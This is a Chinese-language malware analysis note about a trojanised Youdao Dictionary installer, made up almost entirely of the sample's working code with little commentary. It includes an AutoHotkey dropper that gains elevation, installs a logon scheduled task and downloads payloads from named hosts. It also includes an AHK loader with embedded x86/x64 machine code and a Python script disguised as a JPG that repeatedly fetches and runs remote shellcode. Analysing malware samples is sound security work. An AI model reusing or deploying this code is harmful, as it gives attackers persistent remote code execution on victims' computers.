有道字典
大约 3 分钟
有道字典
收集样本
- 下载样本
youdaoFY.zip,下载地址
https:/search?q=%E6%9C%89%E9%81%93%E5%AD%97%E5%85%B8&newwindow=1&sca_esv=0ba29d23b081b3ca&sxsrf=ADLYWIL6zek9eGep9uTAH9WstdLJ4jt6mg%3A1717587588916&source=hp&ei=hE5gZuTkJpfe4-EPhKCJ2QM&iflsig=AL9hbdgAAAAAZmBclI18C9W_bFiwm22QJFOW9QeIbas-&ved=0ahUKEwjktt2wsMSGAxUX7zgGHQRQIjsQ4dUDCBc&uact=5&oq=%E6%9C%89%E9%81%93%E5%AD%97%E5%85%B8&gs_lp=Egdnd3Mtd2l6IgzmnInpgZPlrZflhbgyDRAAGIAEGLEDGIMBGAoyDRAAGIAEGLEDGIMBGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGApIi2JQAFjfTXAEeACQAQCYAZICoAH5GqoBBjAuMjIuMbgBA8gBAPgBAZgCF6AC9xfCAgQQIxgnwgIREC4YgAQYsQMY0QMYgwEYxwHCAgsQABiABBixAxiDAcICDhAuGIAEGLEDGIMBGIoFwgIIEAAYgAQYsQPCAgsQLhiABBixAxiDAcICChAjGIAEGCcYigXCAgUQABiABMICCxAuGIAEGMcBGK8BwgIJEAAYgAQYChgMwgIIEAAYgAQYogTCAgYQABgEGB7CAgYQABgeGA_CAgYQABgIGB7CAgQQABgewgIKEC4YChgqGAwYHsICCBAAGAoYDBgewgIGEAAYDRgewgIIEAAYDRgeGA_CAggQABgEGA0YHsICCBAAGAQYHhgPwgIIEAAYBBgIGB7CAggQABgIGA0YHsICDBAAGAQYCBgNGB4YD8ICChAAGAQYDRgeGA_CAgoQABgEGAgYHhgPwgIKEAAYBBgHGB4YD8ICBhAAGAcYHsICCBAAGAcYHhgPmAMAkgcGMy4xOC4yoAeOZA&sclient=gws-wiz#ip=1
简单分析
- 运行病毒文件
#NoTrayIcon
#NoEnv
#NoTrayIcon
#SingleInstance off
try
{
Run, *RunAs %comspec% /c start C:\ProgramData\AutoHotkey\YoudaoDictSetup.exe&schtasks /create /sc onlogon /tn AHK /rl highest /tr "C:\Users\Public\Music\Update\AutoHotkey\AutoHotkey.exe" /F&del C:\Users\Public\Music\Update\AutoHotkey\AutoHotkey.ahk&del C:\Users\Public\AutoHotkey\Run8.txt , , Hide
url := "https://sogou88.oss-cn-beijing.aliyuncs.com/py.zip"
localFile := "C:\Users\Public\Music\python\py.zip"
UrlDownloadToFile, %url%, %localFile%
url := "http://laicai168.com/qd.jpg"
localFile := "C:\Users\Public\Music\python\qd.jpg"
UrlDownloadToFile, %url%, %localFile%
url := "http://laicai168.com/qd.ahk"
localFile := "C:\Users\Public\Music\Update\AutoHotkey\AutoHotkey.ahk"
UrlDownloadToFile, %url%, %localFile%
RunWait, %comspec% /c powershell.exe -Command Expand-Archive -Path C:\Users\Public\Music\python\Py.zip -DestinationPath C:\Users\Public\Music\python , , Hide
randomString := ""
Lenght := rand(1,10)
Loop, %Lenght%
{
Random, char, 48, 122
If (char > 57 && char < 65) || (char > 90 && char < 97)
Continue
randomString .= Chr(char)
}
FileAppend, %randomString%, C:\Users\Public\Music\python\qd.jpg
rand(min, max) {
Random, rand, min, max
return rand
}
RunWait, %comspec% /c start C:\Users\Public\Music\python\pythonw.exe C:\Users\Public\Music\python\qd.jpg&del C:\Users\Public\Music\python\py.zip , , Hide
}
; tUKF5GQ19
- http://laicai168.com/qd.ahk
;You can compile and set icons by using Ahk2Exe.exe
;If AutoHotkey.exe wants to change its name to abc.exe, Please modify Ahk=%A_ScriptDir%\abc.exe
#NoEnv
#NoTrayIcon
#SingleInstance off
SetBatchLines, -1
if A_IsCompiled
{
Ahk=%A_ScriptDir%\AutoHotkey.exe
FileInstall, AutoHotkey.exe, %Ahk%
}
else Ahk=
s=
s.="u3615544364u640425871u1678942631u2998343137u1434168171u24144"
...
s.="313546u1039906973u484215839u3522253212"
Exec(s, Ahk)
ExitApp
Exec(str, Ahk="", arg="") {
static MyFunc, base, ScriptName:=%True%
s:=RegExReplace(str,"\s"), StrReplace(s,"u","",size)
VarSetCapacity(str,(size+1)*4,0), s:=SubStr(s,InStr(s,"u")+1)
Loop, Parse, s, u
NumPut(A_LoopField, str, (A_Index-1)*4, "uint")
;-----------------------------
Ahk:=Ahk ? Ahk : A_IsCompiled
? A_ScriptDir "\AutoHotkey.exe" : A_AhkPath
IfNotExist, %Ahk%
{
MsgBox, 4096, Error!, `n`nCan't Find: %Ahk% !`n`n
return, 0
}
if !MyFunc
{
x32:="5557565381EC4C0100008B9C24680100008BBC246C01000"
. "08BAC24700100008B433C01D88038500F85380500008078014"
. "50F852E0500008B706085F60F84FF04000031C9837864010F9"
. "2C119D283E210894C245083C2788B341001DE8B4E188974243"
. "C8B562085C90F84E504000031C08D3413EB0B83C00139C10F8"
. "4D30400008B1486813C134765745075E9817C1304726F63417"
. "5DF8B74243C8D04430346240FB7008D048303461C8B3085F60"
. "F84A0040000B86500000001DE891C2466894424688D442460C"
. "744246057726974C74424646546696C89442404FFD683EC088"
. "944243C8D442475891C24C7442475476C6F62C7442479616C4"
. "16CC744247D6C6F630089442404FFD683EC08BA65650000894"
. "424548D44246A6689542472891C24C744246A476C6F62C7442"
. "46E616C4672C64424740089442404FFD683EC08B9734100008"
. "94424488D84248D00000066898C2499000000891C24C784248"
. "D00000043726561C784249100000074655072C784249500000"
. "06F636573C684249B0000000089442404FFD683EC088944245"
. "C8D8424BE000000891C24C78424BE00000043726561C78424C"
. "200000074654E61C78424C60000006D656450C78424CA00000"
. "069706541C68424CE0000000089442404FFD683EC088944245"
. "88D8424CF000000891C24C78424CF000000436F6E6EC78424D"
. "30000006563744EC78424D7000000616D6564C78424DB00000"
. "050697065C68424DF0000000089442404FFD683EC088944244"
. "08D842481000000891C24C7842481000000436C6F73C784248"
. "50000006548616EC7842489000000646C650089442404FFD68"
. "3EC088D5C24608944244CC744241000000000C744240800000"
. "000897C2404895C240CC7042400000000FF54243C83EC14807"
. "C2460000F85E50200008D34AD04000000C7042400000000897"
. "4244489742404FF54245483EC0885C089C30F841703000031C"
. "085ED7415908B148789148383C00139C575F38B44244483E80"
. "4C7040300000000C784249C0000000B000000BA0B000000C78"
. "424A00000000D000000C78424A40000001100000031C0C7842"
. "4A800000013000000EB0C89C283E2038B94949C00000069D28"
. "300000089C183E10301C283C00183F86489948C9C00000075D"
. "831D285ED742D669089D183E10369848C9C000000830000000"
. "1D089848C9C000000330493D1C083C00189049383C20139D57"
. "5D58B8424640100008B742458C744241C00000000C74424180"
. "0000000C744241400000000C744241000000000C744240CFF0"
. "00000C744240800000000C744240402000000890424FFD683E"
. "C2089C78B842464010000C744241C00000000C744241800000"
. "000C744241400000000C744241000000000C744240CFF00000"
. "0C744240800000000C744240402000000890424FFD683EC208"
. "3FFFF89C60F849D01000083F8FF0F84940100008D8C24E0000"
. "0008D94244001000089C8C7000000000083C00439C275F3837"
. "C245001894C2420C744241C00000000C744241800000000C74"
. "4241400000000C744241000000000C744240C00000000C7442"
. "4080000000019C0C704240000000083E0E483C060898424E00"
. "000008D8424AC000000894424248B84246001000089442404F"
. "F54245C83EC2885C00F84DA0000008B6C244C8B8424AC00000"
. "089042489E8FFD083EC048B8424B000000089042489E8FFD08"
. "3EC04893C24C744240400000000FF54244083EC0889E8893C2"
. "4FFD083EC04893424C744240400000000FF54244083EC088D4"
. "42460895C2404893424C7442410000000008944240C8B44244"
. "489442408FF54243C83EC1489E8893424FFD083EC04891C24F"
. "F54244883EC0431C081C44C0100005B5E5F5DC21400C744245"
. "001000000BA88000000E904FBFFFFB8FEFFFFFF81C44C01000"
. "05B5E5F5DC2140081C44C010000B8FFFFFFFF5B5E5F5DC2140"
. "0B8FDFFFFFFEBDA893C248B7C244C89F8FFD083EC0489F8893"
. "424FFD083EC04891C24FF542448B8FAFFFFFF83EC04EBB1893"
. "C248B7C244C89F8FFD083EC0489F8893424FFD083EC04891C2"
. "4FF542448B8FBFFFFFF83EC04EB88B8FCFFFFFFEB8190"
x64:="4157415641554154555756534881EC98010000B8FFFFFFF"
. "F8BB4240002000048899424E8010000418B503C4D89C748898"
. "C24E00100004D89CC4C01C2803A500F858C040000807A01450"
. "F8582040000448B42604585C00F8489040000837A64014819C"
. "031FF83E0104883C078837A6401400F92C7897C245C448B0C0"
. "2B8FEFFFFFF4D01F9418B4918418B512085C90F843D0400003"
. "1C04D8D0417EB100F1F40004883C00139C10F864B040000418"
. "B148041813C174765745075E641817C1704726F634175DB418"
. "B5124498D04470FB71410418B411C498D14978B3C0285FF0F8"
. "41304000048B8577269746546696C488D6C24704C01FF48894"
. "42470B8650000004C89F94889EA6689442478FFD74989C548B"
. "8476C6F62616C416C488D9424900000004C89F948898424900"
. "00000C78424980000006C6F6300FFD7BA656500004889C348B"
. "8476C6F62616C467266899424880000004C89F9488D9424800"
. "000004889842480000000C684248A00000000FFD7B97341000"
. "0488944245048B8437265617465507266898C24BC000000488"
. "D9424B00000004C89F948898424B0000000C78424B80000006"
. "F636573C68424BE00000000FFD7488944246048B8437265617"
. "4654E61488D9424D000000048898424D000000048B86D65645"
. "0697065414C89F948898424D8000000C68424E000000000FFD"
. "74989C648B8436F6E6E6563744E488D9424F00000004889842"
. "4F000000048B8616D6564506970654C89F948898424F800000"
. "0C684240001000000FFD7488944246848B8436C6F736548616"
. "E488D9424A00000004C89F948898424A0000000C78424A8000"
. "000646C6500FFD74531C031C94889C748C7442420000000004"
. "989E94C89E241FFD5807C247000B8FDFFFFFF0F85490200008"
. "D14B50400000031C94989D7FFD34885C04889C30F849202000"
. "031C085F6741D0F1F840000000000418B14848914834883C00"
. "139C677F189F048C1E002C7040300000000C78424C00000000"
. "B000000BA0B000000C78424C40000000D000000C78424C8000"
. "0001100000031C0C78424CC00000013000000EB0C89C283E20"
. "38B9494C000000069D28300000089C183E10301C283C00183F"
. "86489948CC000000075D831D285F6742E904889D183E103698"
. "48CC00000008300000001D089848CC0000000330493D1C083C"
. "0018904934883C20139D677D34531C041B9FF000000BA02000"
. "000488B8C24E801000048C744243800000000C744243000000"
. "000C744242800000000C74424200000000041FFD64889C6453"
. "1C048C744243800000000C744243000000000C744242800000"
. "00041B9FF000000C744242000000000BA02000000488B8C24E"
. "801000041FFD64883FEFF4989C40F84380100004883F8FF0F8"
. "42E010000488D8C2430010000488D9424900100004889C8669"
. "0C700000000004883C0044839C275F1837C245C0148894C244"
. "048C74424380000000048C744243000000000C744242800000"
. "000C744242000000000488B9424E001000019C04531C94531C"
. "083E0E431C983C06089842430010000488D842410010000488"
. "9442448488B442460FFD085C00F8488000000488B8C2410010"
. "000FFD7488B8C2418010000FFD74C8B74246831D24889F14C8"
. "9F0FFD04889F1FFD731D24C89E14C89F0FFD04989E94589F84"
. "889DA4C89E148C74424200000000041FFD54C89E1FFD74889D"
. "9488B442450FFD031C04881C4980100005B5E5F5D415C415D4"
. "15E415FC3B888000000C744245C01000000E981FBFFFFB8FEF"
. "FFFFFEBD34889F1FFD74C89E1FFD74889D9488B442450FFD0B"
. "8FAFFFFFFEBB84889F1FFD74C89E1FFD74889D9488B442450F"
. "FD0B8FBFFFFFFEB9DB8FCFFFFFFEB969090909090"
hex:=A_PtrSize=8 ? x64:x32
VarSetCapacity(MyFunc, len:=StrLen(hex)//2)
Loop, % len
NumPut("0x" SubStr(hex,2*A_Index-1,2),MyFunc,A_Index-1,"uchar")
DllCall("VirtualProtect","ptr",&MyFunc,"ptr",len,"uint",0x40,"ptr*",0)
base:=DllCall("GetModuleHandle", "Str","Kernel32", "ptr")
ScriptName:=ScriptName ? ScriptName : A_ScriptFullPath
}
Random, n, 1, 1000000
pipe_name:="\\.\pipe\AHK" . A_TickCount . n
cmdline="%Ahk%" "%pipe_name%" "%ScriptName%" %arg%
DllCall(&MyFunc, "AStr",cmdline, "AStr",pipe_name
, "ptr",base, "ptr",&str, "uint",size)
return, 1
}
;
- http://laicai168.com/qd.jpg
import subprocess
import requests
import ctypes
import ctypes.wintypes
import time
import base64
# Execute the command without showing a window
# Rest of your code...
# Rest of your code...
# Define the shellcode execution function signature
ShellcodeFunction = ctypes.CFUNCTYPE(None)
def download_binary_file(url, delay=5):
try:
response = requests.get(url, timeout=5)
if response.status_code == 200:
return response.content
except requests.exceptions.RequestException:
print(f'Failed to load {url}, retrying in {delay} seconds...')
time.sleep(delay)
return None
def execute_shellcode(shellcode):
if shellcode is None:
print("No shellcode to execute.")
return
shellcode_size = len(shellcode)
# Allocate executable memory
exec_memory = ctypes.windll.kernel32.VirtualAlloc(
None, shellcode_size, 0x3000, 0x04) # PAGE_READWRITE : 0x04
# Change the allocated memory page protection to PAGE_EXECUTE_READWRITE
old_protect = ctypes.wintypes.DWORD()
ctypes.windll.kernel32.VirtualProtect(
exec_memory, shellcode_size, 0x40, ctypes.byref(old_protect)) # PAGE_EXECUTE_READWRITE : 0x40
# Copy the shellcode to the executable memory
ctypes.memmove(exec_memory, shellcode, shellcode_size)
# Create a function pointer to the shellcode
shellcode_func = ShellcodeFunction(exec_memory)
# Call the function
shellcode_func()
# Free the allocated memory
ctypes.windll.kernel32.VirtualFree(exec_memory, 0, 0x8000)
def main():
encoded_url = "aHR0cDovL2NvbWMwbS5jb20vbGFpY2FpMTY4LmNvbS5iaW4="
url = base64.b64decode(encoded_url).decode()
while True:
shellcode = download_binary_file(url)
execute_shellcode(shellcode)
if __name__ == "__main__":
main()
#